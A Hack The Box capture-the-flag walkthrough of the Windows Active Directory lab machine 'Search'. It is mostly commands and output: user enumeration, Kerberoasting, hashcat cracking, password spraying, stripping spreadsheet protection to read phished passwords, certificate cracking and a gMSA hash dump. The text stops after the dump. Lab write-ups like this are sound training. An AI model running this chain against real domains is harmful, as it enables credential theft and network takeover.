Hack-The-Box-walkthrough[search]

Posted on Edited on In Views: Word count in article: 3.4k Reading time ≈ 12 mins.

introduce

OS: Windows
Difficulty: Hard
Points: 40
Release: 18 Dec 2021
IP: 10.10.11.129

  • my htb rank

Enumeration

NMAP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.129
PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
80/tcp    open  http              Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-01-07 16:21:36Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http          Microsoft IIS httpd 10.0
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
8172/tcp  open  ssl/http          Microsoft IIS httpd 10.0
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49669/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc             Microsoft Windows RPC
49691/tcp open  unknown
49704/tcp open  msrpc             Microsoft Windows RPC
49725/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap reveals a lot of open ports, most of them are Windows based ports. Add the domain to hosts file. Let’s look into web first.

Nothing much available on the web other than team members name. Let’s add these name to a file and enumerate valid usernames.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# /root/kerbrute-master/kerbrute userenum user.txt -d search.htb --dc search.htb 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 01/07/22 - Ronnie Flathers @ropnop

2022/01/07 11:31:26 >  Using KDC(s):
2022/01/07 11:31:26 >   search.htb:88

2022/01/07 11:31:26 >  [+] VALID USERNAME:       Dax.Santiago@search.htb
2022/01/07 11:31:26 >  [+] VALID USERNAME:       Keely.Lyons@search.htb
2022/01/07 11:31:26 >  [+] VALID USERNAME:       Sierra.Frye@search.htb
2022/01/07 11:31:26 >  Done! Tested 8 usernames (3 valid) in 0.235 seconds

Out of eight users only three are valid. Let’s Try to query the domain for users with ‘Do not require Kerberos pre-authentication’ set and export their TGTs for cracking.

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# GetNPUsers.py search.htb/ -usersfile user.txt
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

[-] User Keely.Lyons@search.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Dax.Santiago@search.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Sierra.Frye@search.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

These accounts have not set to ‘Do not require pre-auth’. This means, we can’t perform Kerberoasting attack, it requires a user with Pre-Authentication enabled. We can’t dump LDAP without a valid password of a user. There’s no any interesting directory’s to look into. However, there’s a image which has interesting information.

1
http://search.htb/images/slide_2.jpg

If we look at the August 17 date, it says ‘Send password to Hope Sharp’ and password is mentioned IsolationIsKey? We have username and password of Hope user. We can perform password spaying on recently found accounts too.

1
2
3
4
5
6
7
8
9
10
11
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# crackmapexec smb search.htb -u user.txt -p 'IsolationIsKey?' --shares
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Keely.Lyons@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Dax.Santiago@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Sierra.Frye@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Kyla.Stewart@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Kaiara.Spencer@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Dave.Simpson@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Ben.Thompson@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Chris.Stewart@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE

As you can see, this password is not valid for any of the user which we found recently. Let’s try this password with Hope user.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# crackmapexec smb search.htb -u Hope.Sharp -p 'IsolationIsKey?' --shares
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [+] search.htb\Hope.Sharp:IsolationIsKey? 
SMB         10.10.11.129    445    RESEARCH         [+] Enumerated shares
SMB         10.10.11.129    445    RESEARCH         Share           Permissions     Remark
SMB         10.10.11.129    445    RESEARCH         -----           -----------     ------
SMB         10.10.11.129    445    RESEARCH         ADMIN$                          Remote Admin
SMB         10.10.11.129    445    RESEARCH         C$                              Default share
SMB         10.10.11.129    445    RESEARCH         CertEnroll      READ            Active Directory Certificate Services share
SMB         10.10.11.129    445    RESEARCH         helpdesk                        
SMB         10.10.11.129    445    RESEARCH         IPC$            READ            Remote IPC
SMB         10.10.11.129    445    RESEARCH         NETLOGON        READ            Logon server share 
SMB         10.10.11.129    445    RESEARCH         RedirectedFolders$ READ,WRITE      
SMB         10.10.11.129    445    RESEARCH         SYSVOL          READ            Logon server share

We have access to couple shared directory’s. Let’s look into them.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# smbclient //search.htb/RedirectedFolders$ -U Hope.Sharp
Enter WORKGROUP\Hope.Sharp's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  Dc        0  Fri Jan  7 11:46:39 2022
  ..                                 Dc        0  Fri Jan  7 11:46:39 2022
  abril.suarez                       Dc        0  Tue Apr  7 14:12:58 2020
  Angie.Duffy                        Dc        0  Fri Jul 31 09:11:32 2020
  Antony.Russo                       Dc        0  Fri Jul 31 08:35:32 2020
  belen.compton                      Dc        0  Tue Apr  7 14:32:31 2020
  Cameron.Melendez                   Dc        0  Fri Jul 31 08:37:36 2020
  chanel.bell                        Dc        0  Tue Apr  7 14:15:09 2020
  Claudia.Pugh                       Dc        0  Fri Jul 31 09:09:08 2020
  Cortez.Hickman                     Dc        0  Fri Jul 31 08:02:04 2020
  dax.santiago                       Dc        0  Tue Apr  7 14:20:08 2020
  Eddie.Stevens                      Dc        0  Fri Jul 31 07:55:34 2020
  edgar.jacobs                       Dc        0  Thu Apr  9 16:04:11 2020
  Edith.Walls                        Dc        0  Fri Jul 31 08:39:50 2020
  eve.galvan                         Dc        0  Tue Apr  7 14:23:13 2020
  frederick.cuevas                   Dc        0  Tue Apr  7 14:29:22 2020
  hope.sharp                         Dc        0  Thu Apr  9 10:34:41 2020
  jayla.roberts                      Dc        0  Tue Apr  7 14:07:00 2020
  Jordan.Gregory                     Dc        0  Fri Jul 31 09:01:06 2020
  payton.harmon                      Dc        0  Thu Apr  9 16:11:39 2020
  Reginald.Morton                    Dc        0  Fri Jul 31 07:44:32 2020
  santino.benjamin                   Dc        0  Tue Apr  7 14:10:25 2020
  Savanah.Velazquez                  Dc        0  Fri Jul 31 08:21:42 2020
  sierra.frye                        Dc        0  Wed Nov 17 20:01:46 2021
  trace.ryan                         Dc        0  Thu Apr  9 16:14:26 2020

                3246079 blocks of size 4096. 458738 blocks available
smb: \>

More user information is present in this directory. Let’s add these to user.txt file. We can access Hope users directory, but for the rest we don’t have permission to read or list the contents.

Now we have a valid username and password, we can dump LDAP.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# bloodhound-python -u Hope.Sharp -p 'IsolationIsKey?' -ns 10.10.11.129 -d search.htb -c All                                  1 ⨯
INFO: Found AD domain: search.htb
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 113 computers
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 106 users
INFO: Found 63 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Windows-100.search.htb
INFO: Querying computer: Windows-99.search.htb
INFO: Querying computer: Windows-98.search.htb
INFO: Querying computer: Windows-97.search.htb
INFO: Querying computer: Windows-96.search.htb
INFO: Querying computer: Windows-95.search.htb
INFO: Querying computer: Windows-94.search.htb
INFO: Querying computer: Windows-93.search.htb
INFO: Querying computer: Windows-92.search.htb
INFO: Querying computer: Windows-91.search.htb
----------SNIP----------

We have a vhost, let’s add that to host file. Now we can use this dump to visualize it using bloodhound GUI. Upload all the dumped data.

This is the shortest path to domain admin. However, we don’t have access to any of the user who are member of ‘ITSEC’. We have access to ‘Hope Sharp’ user but she’s not a member of ITSEC. However, if we look for Kerberoastable Accounts, then we’d find two.

This ‘Web_svc’ account is created by HelpDesk and it is temporary. It is being used as Web Service, so basically it is a service account.

The SPN is not null, so we can Kerberoast to extract service account credentials (hash) from Active Directory as a regular user without sending any packets to the target system.

  • Kerberoasting without SPNs

1
2
3
4
5
6
7
8
9
10
11
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# GetUserSPNs.py -request -dc-ip 10.10.11.129 search.htb/Hope.Sharp:IsolationIsKey?
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

ServicePrincipalName               Name     MemberOf  PasswordLastSet             LastLogon  Delegation 
---------------------------------  -------  --------  --------------------------  ---------  ----------
RESEARCH/web_svc.search.htb:60001  web_svc            2020-04-09 08:59:11.329031  <never>               



$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$4ee5fdd7f42a0f84f9ac17f136b3f069$01dd7ba8711fd95bdc8360787582d5a4ca21ab2292505d3a3d00343015008eaf0fc7b2151f58f0b91f4f5fc5b18aaae33a5181e98b15951f8fdfa5df0dde76d1f8821b72e0e321993ec8cc7ceed84ac1ec33f85693ef3c204cef1e0dc14221ca3e0308262fb8634e268c56d9ddc44b5368038fed232e669772dc1748a8400e8181c61f065e773a5d5cf37fd036934f6ac77904eb62b1d6ea68f4f86c609053298fb64979293e709f00bf7fe42b2d77c327fc2180c7aec3a01134a1daee99b4134be38879805f576ad0d02818c3e8838720cef5e42f442ea13d6426f47a38c9ad40c106faceae7e20c9773e87870ab4f470da4f3911a1ca476e9e874fa0afcf2395e419db524a69c6013ec760dcc357fdfad8158205d5bce95f1ca6949e53a1be01d168fb23f36c12da34292310054e78a4f85b0291edc28396e01793d79f61edfb66cf95fb91d5fe001062fbf164ddfca6e967edf6b62052055f9fc15205d37437f6689f97fb5de7ec1cf50c71220d60425ed596d95de7583e4650eb401d08020532d1453baf3cfd8a20d8dc1dea9559ad1e9340199160163ada904dcff8a93ffe405e4773bfdd63aa54fee3fe75dda48c4be602b1d519292b3f8525d06f81dced00161c984b2865709f31cee9f7f6cb8eaf4578f98acb594367a1a75ae3ce1e7c30694870c3846ca4a28688863aafb96ebf80c035c6f903ebc29922440b3cbd933d2ffa8cdcb832b15bc65e17f33b03a9e39344face26222797e4858765bb822013822c7b0c16aceb0c69e5d1449561860660aee435e03c25e4e1e56489c5b1c31b159a043e67c10ebade504314ab4a92e6cfaf84265b05b6becf91a9609f67f318b3ca2f5b8bbe48c5c1ee2d2ee5d76808af85711768f70cc6fa44a52709f09a6bf66a1cb0eaaa7a2557d170da2e3f93af61bfe03b4823642f5856fe1f903879dde38e1673412e7acd44feb7b6d56baf2c619344cd255a6211e93997990cc5d9590cba762c818e177cab3e863fb606ef3a59b01cae79245ce48f4adfcb8a2191fdc50e22e0efcbc6f1a32b7d9e01e45a084bc28d16dce196c4764bbb69923a74f74a7979359a4027e4f7b3a6035308b41d35779290c63af219520061a8d135445b4627f6d653dfc782e58f8be41319daff7d11839be8b1cf00d45d2f2edaf38688e88d3e87db5e256ed3af5c00e819e6e17fc68310de406de59271c646279a5c3f300fc85cd514f7840c560a82bb47ead06bc80f031816c7c612058143a83e53bd1826856177bbd53484f9f70a861ad4f3544b2699ee9017e06377f132db59f83e1715b8c7d3b71ecd92e388ce358fa6602c2591d3feff427b7b4c072c0d6d41ef9c0a150ae100a064267a98dc9a3325a33b2b8881a926b8ab88076527e54c153440a51efcaffc1e230e7eebe7259e3d7d826a4eb061a8e2d8a53459fada32331caf5f21a9dd80669e0b88ca9966bd04425ec2e1

We got the hash of Web_svc service account. Let’s try to crack it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
hashcat.exe -m 13100 password.txt rockyou.txt

$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$4ee5fdd7f42a0f84f9ac17f136b3f069$01dd7ba8711fd95bdc8360787582d5a4ca21ab2292505d3a3d00343015008eaf0fc7b2151f58f0b91f4f5fc5b18aaae33a5181e98b15951f8fdfa5df0dde76d1f8821b72e0e321993ec8cc7ceed84ac1ec33f85693ef3c204cef1e0dc14221ca3e0308262fb8634e268c56d9ddc44b5368038fed232e669772dc1748a8400e8181c61f065e773a5d5cf37fd036934f6ac77904eb62b1d6ea68f4f86c609053298fb64979293e709f00bf7fe42b2d77c327fc2180c7aec3a01134a1daee99b4134be38879805f576ad0d02818c3e8838720cef5e42f442ea13d6426f47a38c9ad40c106faceae7e20c9773e87870ab4f470da4f3911a1ca476e9e874fa0afcf2395e419db524a69c6013ec760dcc357fdfad8158205d5bce95f1ca6949e53a1be01d168fb23f36c12da34292310054e78a4f85b0291edc28396e01793d79f61edfb66cf95fb91d5fe001062fbf164ddfca6e967edf6b62052055f9fc15205d37437f6689f97fb5de7ec1cf50c71220d60425ed596d95de7583e4650eb401d08020532d1453baf3cfd8a20d8dc1dea9559ad1e9340199160163ada904dcff8a93ffe405e4773bfdd63aa54fee3fe75dda48c4be602b1d519292b3f8525d06f81dced00161c984b2865709f31cee9f7f6cb8eaf4578f98acb594367a1a75ae3ce1e7c30694870c3846ca4a28688863aafb96ebf80c035c6f903ebc29922440b3cbd933d2ffa8cdcb832b15bc65e17f33b03a9e39344face26222797e4858765bb822013822c7b0c16aceb0c69e5d1449561860660aee435e03c25e4e1e56489c5b1c31b159a043e67c10ebade504314ab4a92e6cfaf84265b05b6becf91a9609f67f318b3ca2f5b8bbe48c5c1ee2d2ee5d76808af85711768f70cc6fa44a52709f09a6bf66a1cb0eaaa7a2557d170da2e3f93af61bfe03b4823642f5856fe1f903879dde38e1673412e7acd44feb7b6d56baf2c619344cd255a6211e93997990cc5d9590cba762c818e177cab3e863fb606ef3a59b01cae79245ce48f4adfcb8a2191fdc50e22e0efcbc6f1a32b7d9e01e45a084bc28d16dce196c4764bbb69923a74f74a7979359a4027e4f7b3a6035308b41d35779290c63af219520061a8d135445b4627f6d653dfc782e58f8be41319daff7d11839be8b1cf00d45d2f2edaf38688e88d3e87db5e256ed3af5c00e819e6e17fc68310de406de59271c646279a5c3f300fc85cd514f7840c560a82bb47ead06bc80f031816c7c612058143a83e53bd1826856177bbd53484f9f70a861ad4f3544b2699ee9017e06377f132db59f83e1715b8c7d3b71ecd92e388ce358fa6602c2591d3feff427b7b4c072c0d6d41ef9c0a150ae100a064267a98dc9a3325a33b2b8881a926b8ab88076527e54c153440a51efcaffc1e230e7eebe7259e3d7d826a4eb061a8e2d8a53459fada32331caf5f21a9dd80669e0b88ca9966bd04425ec2e1:@3ONEmillionbaby

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*...5ec2e1
Time.Started.....: Sat Jan 08 02:00:20 2022 (1 sec)
Time.Estimated...: Sat Jan 08 02:00:21 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 14880.9 kH/s (9.10ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Speed.#3.........:   271.1 kH/s (13.03ms) @ Accel:32 Loops:1 Thr:8 Vec:1
Speed.#*.........: 15152.0 kH/s
Recovered........: 1/1 (100.00%) Digests
Progress.........: 12828672/14344385 (89.43%)
Rejected.........: 0/12828672 (0.00%)
Restore.Point....: 11214848/14344385 (78.18%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: DR3KSILL0 -> 23~1~19
Candidates.#3....: 2380146112071401 -> 234tjg
Hardware.Mon.#1..: Temp: 59c Util: 29% Core: 528MHz Mem:2279MHz Bus:8
Hardware.Mon.#3..: N/A

Started: Sat Jan 08 01:59:54 2022
Stopped: Sat Jan 08 02:00:22 2022

We got the password for web_svc service account, let’s spray this password across all the accounts which we have found so far.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# crackmapexec smb search.htb -u user.txt -p '@3ONEmillionbaby' --continue-on-success
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\abril.suarez:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Angie.Duffy:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Antony.Russo:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\belen.compton:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Cameron.Melendez:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\chanel.bell:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Claudia.Pugh:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Cortez.Hickman:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\dax.santiago:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Eddie.Stevens:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [+] search.htb\edgar.jacobs:@3ONEmillionbaby 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Edith.Walls:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\eve.galvan:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\frederick.cuevas:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\hope.sharp:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\jayla.roberts:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Jordan.Gregory:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\payton.harmon:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Reginald.Morton:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\santino.benjamin:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Savanah.Velazquez:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\sierra.frye:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\trace.ryan:@3ONEmillionbaby STATUS_LOGON_FAILURE

One user account is using the same password as service account. Let’s look into shares of that user.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# smbclient //search.htb/RedirectedFolders$ -U edgar.jacobs
Enter WORKGROUP\edgar.jacobs's password: 
Try "help" to get a list of possible commands.
smb: \> cd edgar.jacobs\Desktop\
smb: \edgar.jacobs\Desktop\> ls
  .                                 DRc        0  Mon Aug 10 06:02:16 2020
  ..                                DRc        0  Mon Aug 10 06:02:16 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 16:05:29 2020
  desktop.ini                      AHSc      282  Mon Aug 10 06:02:16 2020
  Microsoft Edge.lnk                 Ac     1450  Thu Apr  9 16:05:03 2020
  Phishing_Attempt.xlsx              Ac    23130  Mon Aug 10 06:35:44 2020

                3246079 blocks of size 4096. 458449 blocks available

There’s a XLS file, download that to your machine.

This XLS document has two sheets, one of them has captured passwords of phishing and another has a list of username. As you can see the lock symbol on second sheet, a column is being locked with a password.

You can confirm it by resizing the cell which is in between lastname and Username. There are two ways to remove the password. Upload it on google drive and access it via sheets, it will remove the password for you. This is the easiest way. If you want to remove it manually, then you need unzip this xlsx file and delete the below link from the sheet2.xml file.

1
2
3
<sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg"
saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>

You can find this ‘sheet2.xml’ file after unzipping the xlsx file.
Location: xl/worksheets/sheet2.xml Once you delete that line, you need to zip it back.

1
zip -r Phishing.xls .

Open the xls file and double click on the line which is between D and B to see the passwords.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
firstname	lastname	password	Username
Payton	Harmon	;;36!cried!INDIA!year!50;;	Payton.Harmon
Cortez	Hickman	..10-time-TALK-proud-66..	Cortez.Hickman
Bobby	Wolf	??47^before^WORLD^surprise^91??	Bobby.Wolf
Margaret	Robinson	//51+mountain+DEAR+noise+83//	Margaret.Robinson
Scarlett	Parks	++47|building|WARSAW|gave|60++	Scarlett.Parks
Eliezer	Jordan	!!05_goes_SEVEN_offer_83!!	Eliezer.Jordan
Hunter	Kirby	~~27%when%VILLAGE%full%00~~	Hunter.Kirby
Sierra	Frye	$$49=wide=STRAIGHT=jordan=28$$18	Sierra.Frye
Annabelle	Wells	==95~pass~QUIET~austria~77==	Annabelle.Wells
Eve	Galvan	//61!banker!FANCY!measure!25//	Eve.Galvan
Jeramiah	Fritz	??40:student:MAYOR:been:66??	Jeramiah.Fritz
Abby	Gonzalez	&&75:major:RADIO:state:93&&	Abby.Gonzalez
Joy	Costa	**30*venus*BALL*office*42**	Joy.Costa
Vincent	Sutton	**24&moment&BRAZIL&members&66**	Vincent.Sutton

Now we have 15 more username & passwords. If we look at the bloodhound visual path to domain admin, out of all the users, there are only two are in the password list. Abby and Sierra will lead to domain admin. The Abby password didn’t work, but Sierra’s did.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# smbclient //search.htb/RedirectedFolders$ -U Sierra.Frye
Enter WORKGROUP\Sierra.Frye's password: 
Try "help" to get a list of possible commands.
smb: \> cd sierra.frye\Desktop\
smb: \sierra.frye\Desktop\> ls
  .                                 DRc        0  Wed Nov 17 20:08:00 2021
  ..                                DRc        0  Wed Nov 17 20:08:00 2021
  $RECYCLE.BIN                     DHSc        0  Tue Apr  7 14:03:59 2020
  desktop.ini                      AHSc      282  Fri Jul 31 10:42:15 2020
  Microsoft Edge.lnk                 Ac     1450  Tue Apr  7 08:28:05 2020
  user.txt                           Ac       33  Wed Nov 17 19:55:27 2021

                3246079 blocks of size 4096. 458293 blocks available
smb: \sierra.frye\Desktop\> get user.txt
getting file \sierra.frye\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

┌──(root💀kali)-[~/hackthebox/machine/search]
└─# cat user.txt   
5c7b277e24c9c5a866f572bdff53f0f4

We have user flag now.

1
2
3
4
5
6
7
8
smb: \sierra.frye\Desktop\> cd \sierra.frye\Downloads\Backups\
smb: \sierra.frye\Downloads\Backups\> ls
  .                                 DHc        0  Mon Aug 10 16:39:17 2020
  ..                                DHc        0  Mon Aug 10 16:39:17 2020
  search-RESEARCH-CA.p12             Ac     2643  Fri Jul 31 11:04:11 2020
  staff.pfx                          Ac     4326  Mon Aug 10 16:39:17 2020

                3246079 blocks of size 4096. 458293 blocks available

Under Downloads we will find Cryptography files. Let’s download them to our machine.

1
2
3
4
smb: \sierra.frye\Downloads\Backups\> get search-RESEARCH-CA.p12
getting file \sierra.frye\Downloads\Backups\search-RESEARCH-CA.p12 of size 2643 as search-RESEARCH-CA.p12 (1.7 KiloBytes/sec) (average 1.1 KiloBytes/sec)
smb: \sierra.frye\Downloads\Backups\> get staff.pfx
getting file \sierra.frye\Downloads\Backups\staff.pfx of size 4326 as staff.pfx (5.6 KiloBytes/sec) (average 2.2 KiloBytes/sec)

A p12 file contains a digital certificate that uses PKCS#12 (Public Key Cryptography Standard #12) encryption. It is used as a portable format for transferring personal private keys and other sensitive information. P12 files are used by various security and encryption programs. It is generally referred to as a “PFX file”.

We can try to upload this certificate to browser (firefox).

It asks for the password. We can try to crack the password using bellow tool.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# /root/p12tool/p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt

██████╗  ██╗██████╗ ████████╗ ██████╗  ██████╗ ██╗     
██╔══██╗███║╚════██╗╚══██╔══╝██╔═══██╗██╔═══██╗██║     
██████╔╝╚██║ █████╔╝   ██║   ██║   ██║██║   ██║██║     
██╔═══╝  ██║██╔═══╝    ██║   ██║   ██║██║   ██║██║     
██║      ██║███████╗   ██║   ╚██████╔╝╚██████╔╝███████╗
╚═╝      ╚═╝╚══════╝   ╚═╝    ╚═════╝  ╚═════╝ ╚══════╝

Version: 1.0 (n/a) - 01/07/22 - Evi1cg

2022/01/07 15:42:12 ->  [*] Brute forcing...
2022/01/07 15:42:12 ->  [*] Start thread num 100
2022/01/07 15:42:12 -> [+] Password found ==> misspissy
2022/01/07 15:42:12 -> [*] Successfully cracked password after 5484391 attempts!

If you are on VM then it’d take much more time. Now we have the password for the certificate. Let’s add it in our browser.

There’s a specific endpoint which you can access with this certificate.

1
https://search.htb/staff/en-US/logon.aspx

Now we need to input the credentials of ‘Sierra’ user and access PowerShell Console.

1
2
3
Sierra.Frye
$$49=wide=STRAIGHT=jordan=28$$18	
research.search.htb

After login we can run Powershell commands.

Let’s go back to bloodhound and look for path from owned principle to domain admin.

As we are member of ITSEC, we can read GMSA password.

BIR-ADFS-GMSA@SEARCH.HTB is a Group Managed Service Account. The group ITSEC@SEARCH.HTB can retrieve the password for the GMSA BIR-ADFS-GMSA@SEARCH.HTB

1
2
3
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# python3 /root/gMSADumper-main/gMSADumper.py -d search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18'
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f

gMSAs use 240-byte, randomly generated complex passwords. So, it’s hard to crack.

  • Reading GMSA Password

  • Passwordless PowerShell - How to use gMSAs In Your Scripts

  • GMSA Attributes in the Active Directory

